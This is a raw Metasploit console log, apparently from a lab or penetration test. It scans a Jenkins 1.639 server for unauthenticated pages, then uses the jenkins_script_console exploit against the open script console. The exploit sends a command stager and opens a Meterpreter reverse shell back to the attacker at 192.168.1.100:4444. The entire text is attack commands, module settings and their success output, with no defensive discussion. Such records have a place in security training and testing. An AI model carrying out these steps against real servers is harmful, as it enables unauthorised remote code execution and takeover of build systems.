Metasploit - Jenkins

msf auxiliary(jenkins_enum) > show options

Module options (auxiliary/scanner/http/jenkins_enum):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS     192.168.1.111    yes       The target address range or CIDR identifier
RPORT      8080             yes       The target port
TARGETURI  /                yes       Path to Jenkins instance
THREADS    1                yes       The number of concurrent threads
VHOST                       no        HTTP server virtual host

msf auxiliary(jenkins_enum) > run

[*] 192.168.1.111:8080 - Jenkins Version - 1.639
[+] 192.168.1.111:8080 - /script does not require authentication (200)
[+] 192.168.1.111:8080 - /view/All/newJob does not require authentication (200)
[+] 192.168.1.111:8080 - /asynchPeople/ does not require authentication (200)
[+] 192.168.1.111:8080 - /systemInfo does not require authentication (200)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

msf exploit(jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

Name       Current Setting  Required  Description
----       ---------------  --------  -----------
PASSWORD                    no        The password for the specified username
Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
RHOST      192.168.1.111    yes       The target address
RPORT      8080             yes       The target port
TARGETURI  /                yes       The path to jenkins
USERNAME                    no        The username to authenticate as
VHOST                       no        HTTP server virtual host

Exploit target:

Id  Name
--  ----
0   Windows

msf exploit(jenkins_script_console) > run

[*] Started reverse handler on 192.168.1.100:4444
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.1.111:8080 - Sending command stager...
[*] Command Stager progress -   2.06% done (2048/99626 bytes)
[*] Command Stager progress -   4.11% done (4096/99626 bytes)
[*] Command Stager progress -   6.17% done (6144/99626 bytes)
[*] Command Stager progress -   8.22% done (8192/99626 bytes)
[*] Command Stager progress -  10.28% done (10240/99626 bytes)
[*] Command Stager progress -  12.33% done (12288/99626 bytes)
[*] Command Stager progress -  14.39% done (14336/99626 bytes)
[*] Command Stager progress -  16.45% done (16384/99626 bytes)
[*] Command Stager progress -  18.50% done (18432/99626 bytes)
[*] Command Stager progress -  20.56% done (20480/99626 bytes)
[*] Command Stager progress -  22.61% done (22528/99626 bytes)
[*] Command Stager progress -  24.67% done (24576/99626 bytes)
[*] Command Stager progress -  26.72% done (26624/99626 bytes)
[*] Command Stager progress -  28.78% done (28672/99626 bytes)
[*] Command Stager progress -  30.84% done (30720/99626 bytes)
[*] Command Stager progress -  32.89% done (32768/99626 bytes)
[*] Command Stager progress -  34.95% done (34816/99626 bytes)
[*] Command Stager progress -  37.00% done (36864/99626 bytes)
[*] Command Stager progress -  39.06% done (38912/99626 bytes)
[*] Command Stager progress -  41.11% done (40960/99626 bytes)
[*] Command Stager progress -  43.17% done (43008/99626 bytes)
[*] Command Stager progress -  45.23% done (45056/99626 bytes)
[*] Command Stager progress -  47.28% done (47104/99626 bytes)
[*] Command Stager progress -  49.34% done (49152/99626 bytes)
[*] Command Stager progress -  51.39% done (51200/99626 bytes)
[*] Command Stager progress -  53.45% done (53248/99626 bytes)
[*] Command Stager progress -  55.50% done (55296/99626 bytes)
[*] Command Stager progress -  57.56% done (57344/99626 bytes)
[*] Command Stager progress -  59.61% done (59392/99626 bytes)
[*] Command Stager progress -  61.67% done (61440/99626 bytes)
[*] Command Stager progress -  63.73% done (63488/99626 bytes)
[*] Command Stager progress -  65.78% done (65536/99626 bytes)
[*] Command Stager progress -  67.84% done (67584/99626 bytes)
[*] Command Stager progress -  69.89% done (69632/99626 bytes)
[*] Command Stager progress -  71.95% done (71680/99626 bytes)
[*] Command Stager progress -  74.00% done (73728/99626 bytes)
[*] Command Stager progress -  76.06% done (75776/99626 bytes)
[*] Command Stager progress -  78.12% done (77824/99626 bytes)
[*] Command Stager progress -  80.17% done (79872/99626 bytes)
[*] Command Stager progress -  82.23% done (81920/99626 bytes)
[*] Command Stager progress -  84.28% done (83968/99626 bytes)
[*] Command Stager progress -  86.34% done (86016/99626 bytes)
[*] Command Stager progress -  88.39% done (88064/99626 bytes)
[*] Command Stager progress -  90.45% done (90112/99626 bytes)
[*] Command Stager progress -  92.51% done (92160/99626 bytes)
[*] Command Stager progress -  94.56% done (94208/99626 bytes)
[*] Command Stager progress -  96.62% done (96256/99626 bytes)
[*] Command Stager progress -  98.67% done (98304/99626 bytes)
[*] Command Stager progress - 100.00% done (99626/99626 bytes)
[*] Sending stage (957487 bytes) to 192.168.1.111
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.111:49239) at 2015-12-10 12:06:43 +0000

meterpreter >